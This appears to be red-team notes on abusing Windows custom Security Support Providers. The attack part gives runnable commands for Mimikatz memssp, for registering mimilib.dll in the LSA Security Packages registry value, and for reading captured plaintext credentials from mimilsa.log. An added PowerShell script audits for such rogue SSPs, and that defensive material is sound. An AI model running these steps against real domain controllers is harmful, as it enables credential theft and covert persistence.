Custom Security Service Providers (SSPs)
A Security Service Provider (SSP; Microsoft's own term is Security Support Provider) is a DLL that the Local Security Authority (LSA) loads to implement an authentication protocol through the Security Support Provider Interface (SSPI), so that applications can establish authenticated connections.
Standard SSPs include:
NTLM
Kerberos
Negotiate
Secure Channel (Schannel)
Digest
Credential (CredSSP)
At startup, the LSA process loads the SSP DLLs listed in the registry. This allows attackers with the required privileges to register their own custom DLL, which will then be loaded on the next reboot. Because such a DLL sees the plaintext credentials passed to the LSA, it may allow us to capture credentials and use them to persist further in the network.
Mimikatz ships its own SSP DLL (mimilib.dll), which we use here as the example.
Injecting the Custom DLL
Requires Domain Admin privileges and must be performed on the DC.
Method 1 - Using Mimikatz
Note: this does not work very well on Server 2016
Invoke-Mimikatz -Command '"misc::memssp"'
Method 2 - Drop mimilib.dll into system32 and add mimilib to the security packages
# Step 1 - Add mimilib.dll to C:\Windows\system32
# Step 2
# Read the current REG_MULTI_SZ list of security packages
$packages = Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
# Append mimilib (the LSA resolves it to mimilib.dll in System32) and write the list back
$packages += "mimilib"
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' -Value $packages
# Then check HKEY_Local_Machine\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig in regedit to confirm the addition
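A defender's counterpart to the steps above, added here and not part of the original notes: it reads the Security Packages value on both LSA keys, flags any entry that is not a built-in package, reports whether the matching DLL exists in System32 and who signed it, and checks for the two log files this page names. The baseline list and the System32 lookup are assumptions of the example, not something the page states.

```powershell
# Added example: audit the LSA 'Security Packages' registry values for
# non-standard SSPs. Run as Administrator on the host being inspected.
# Assumed baseline of built-in package names (lower-case); extend it for
# legitimate third-party SSPs in your estate.
$baseline = @('kerberos','msv1_0','schannel','wdigest','tspkg','pku2u','cloudap','negoexts')
$keys = @(
    'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa',
    'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig'
)

$findings = foreach ($key in $keys) {
    # REG_MULTI_SZ comes back as a string array; a missing value yields $null
    $packages = (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
    foreach ($pkg in @($packages)) {
        # The default value on many systems is a literal "" entry; strip quotes and skip blanks
        $name = ([string]$pkg).Trim().Trim('"')
        if ([string]::IsNullOrWhiteSpace($name)) { continue }
        if ($baseline -contains $name.ToLower()) { continue }

        # The LSA loads <name>.dll from System32, which is where the page drops mimilib.dll
        $dll = Join-Path $env:SystemRoot "System32\$name.dll"
        $present = Test-Path -Path $dll
        $signer = if ($present) { (Get-AuthenticodeSignature -FilePath $dll).SignerCertificate.Subject } else { $null }

        [pscustomobject]@{
            Key       = $key
            Package   = $name
            DllExists = $present
            Signer    = $signer
        }
    }
}

# The capture logs named on this page are a cheap indicator on their own
$logs = 'mimilsa.log','kiwissp.log' |
    ForEach-Object { Join-Path $env:SystemRoot "System32\$_" } |
    Where-Object { Test-Path -Path $_ }

if ($findings) { $findings | Format-Table -AutoSize } else { 'No non-baseline security packages registered.' }
if ($logs)     { "Suspicious SSP log files present: $($logs -join ', ')" }
```

A non-baseline entry is not proof of compromise by itself (some endpoint products register their own SSP), so treat an unsigned or unexpected DLL as the trigger for an investigation rather than the verdict.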
Check the log files for captured credentials
# either mimilsa.log or kiwissp.log, depending on which method was used
# I believe it's mimilsa.log if you use Mimikatz, kiwissp.log if you manually drop the DLL
type c:\windows\system32\mimilsa.log